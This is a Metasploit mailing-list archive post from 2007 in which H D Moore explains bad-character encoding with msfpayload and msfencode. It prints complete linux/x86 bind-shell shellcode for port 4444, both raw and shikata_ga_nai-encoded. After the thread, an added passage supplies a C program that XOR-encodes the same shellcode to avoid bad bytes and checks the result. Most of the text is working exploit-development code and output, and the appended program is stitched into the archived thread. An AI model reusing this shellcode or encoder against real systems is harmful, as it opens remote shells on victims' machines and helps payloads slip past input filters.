Metasploit mailing list archives
Building multistage payloaded exploits?
From: hdm at metasploit.com (H D Moore)
Date: Mon, 24 Sep 2007 18:10:10 -0500
You are probably doing something wrong ;-) The msfpayload command only generates the raw shellcode; if you want to encode it, you need to generate it in "raw" mode, then pass it into msfencode, which takes the -b parameter defining the bad character set. For example:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false
 */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

# now, let's remove the 0xcd and 0x80
$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \
    msfencode -a x86 -b '\xcd\x80' -t c
[*] x86/shikata_ga_nai succeeded, final size 106
unsigned char buf[] =
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"
"\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"
"\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"
"\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"
"\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"
"\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"
"\x41";

-HD

On Monday 24 September 2007 18:02, scotty to hotty wrote:
> Thanks hdm for clarifying my research :P. Now, I noticed problems when I specify bad characters in Metasploit... it always spits the payload out with the bad characters still in the exploit... When I use msf2 it works fine, but when I use msf3 it keeps everything I specify to get removed. Any workarounds to this problem? Or am I doing something wrong?
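The following is an added example, not code from the thread and not Metasploit's encoder, that shows what `msfencode -b` is doing on your behalf and the check you should run on the result. It takes the 78 raw bind-shell bytes printed above as sample input, reports the offset of the first `\xcd` or `\x80`, searches for a single-byte XOR key that keeps both the key and every encoded byte out of the bad set, and verifies the round trip. The XOR scheme and the second, larger bad set (`\x00\x0a\x0d\xcd\x80`, a common choice for string-copy bugs) are assumptions made for this example; shikata_ga_nai is a polymorphic encoder with a prepended decoder stub and is not reproduced here.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Sample input: the raw linux/x86/shell_bind_tcp (LPORT=4444) bytes printed
 * by msfpayload in the message above, 78 bytes. */
static const unsigned char raw_payload[] =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80";
#define RAW_LEN (sizeof(raw_payload) - 1)   /* drop the string terminator */

/* Bad-character set from the msfencode -b '\xcd\x80' example above. */
static const unsigned char bad_cd80[] = { 0xcd, 0x80 };
/* A constructed, larger set (NUL, LF, CR plus the two above) for comparison. */
static const unsigned char bad_null_nl[] = { 0x00, 0x0a, 0x0d, 0xcd, 0x80 };

/* Offset of the first byte of buf that appears in bad[], or -1 if none. */
long find_bad_byte(const unsigned char *buf, size_t len,
                   const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Toy encoder (assumption for this example, not shikata_ga_nai): search for a
 * single-byte XOR key k in 1..255 such that k itself and every byte of
 * buf ^ k stay out of bad[]. Key 0 is skipped because it changes nothing.
 * Returns the key, or -1 if no single-byte key satisfies the set. */
int find_xor_key(const unsigned char *buf, size_t len,
                 const unsigned char *bad, size_t nbad)
{
    for (int k = 1; k < 256; k++) {
        unsigned char kb = (unsigned char)k;
        if (find_bad_byte(&kb, 1, bad, nbad) >= 0)
            continue;                     /* the key byte itself is bad */
        size_t i;
        for (i = 0; i < len; i++) {
            unsigned char e = buf[i] ^ kb;
            if (find_bad_byte(&e, 1, bad, nbad) >= 0)
                break;                    /* this key produces a bad byte */
        }
        if (i == len)
            return k;
    }
    return -1;
}

/* XOR every byte of in[] with key into out[] (same length). XOR is its own
 * inverse, so applying it twice with the same key restores the input. */
void xor_buf(const unsigned char *in, unsigned char *out, size_t len,
             unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Encode raw_payload against bad[] into out (>= RAW_LEN bytes).
 * Returns the key used, or -1 if no key was found. */
int encode_payload(const unsigned char *bad, size_t nbad, unsigned char *out)
{
    int key = find_xor_key(raw_payload, RAW_LEN, bad, nbad);
    if (key < 0)
        return -1;
    xor_buf(raw_payload, out, RAW_LEN, (unsigned char)key);
    return key;
}

/* Encode, confirm the output is clean, decode and compare: 1 on success. */
int encode_roundtrip_ok(const unsigned char *bad, size_t nbad)
{
    unsigned char enc[RAW_LEN], dec[RAW_LEN];
    int key = encode_payload(bad, nbad, enc);
    if (key < 0 || find_bad_byte(enc, RAW_LEN, bad, nbad) >= 0)
        return 0;
    xor_buf(enc, dec, RAW_LEN, (unsigned char)key);
    return memcmp(dec, raw_payload, RAW_LEN) == 0;
}

/* Print a buffer in the "unsigned char buf[]" layout that msfencode -t c uses. */
static void dump_c(const unsigned char *buf, size_t len)
{
    printf("unsigned char buf[] =\n");
    for (size_t i = 0; i < len; i++) {
        if (i % 15 == 0)
            printf("%s\"", i ? "\"\n" : "");
        printf("\\x%02x", buf[i]);
    }
    printf("\";\n");
}

int main(void)
{
    unsigned char enc[RAW_LEN];
    printf("raw payload: first bad byte at offset %ld\n",
           find_bad_byte(raw_payload, RAW_LEN, bad_cd80, sizeof bad_cd80));
    int key = encode_payload(bad_cd80, sizeof bad_cd80, enc);
    if (key < 0) {
        fprintf(stderr, "no single-byte XOR key avoids the bad set\n");
        return 1;
    }
    printf("xor key 0x%02x; encoded: first bad byte at offset %ld\n", key,
           find_bad_byte(enc, RAW_LEN, bad_cd80, sizeof bad_cd80));
    dump_c(enc, RAW_LEN);
    printf("round trip %s\n",
           encode_roundtrip_ok(bad_cd80, sizeof bad_cd80) ? "ok" : "FAILED");
    return 0;
}
```

A real encoder also has to prepend a decoder stub that itself contains no bad bytes and finds the encoded body at runtime; that stub is where the difference between msfencode's 106 bytes and the 78 raw bytes above comes from. The check worth keeping from this example is the final `find_bad_byte` pass, run over the complete buffer that actually goes into the exploit, decoder included.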
Current thread:
- Building multistage payloaded exploits? scotty to hotty (Sep 22)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 25)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)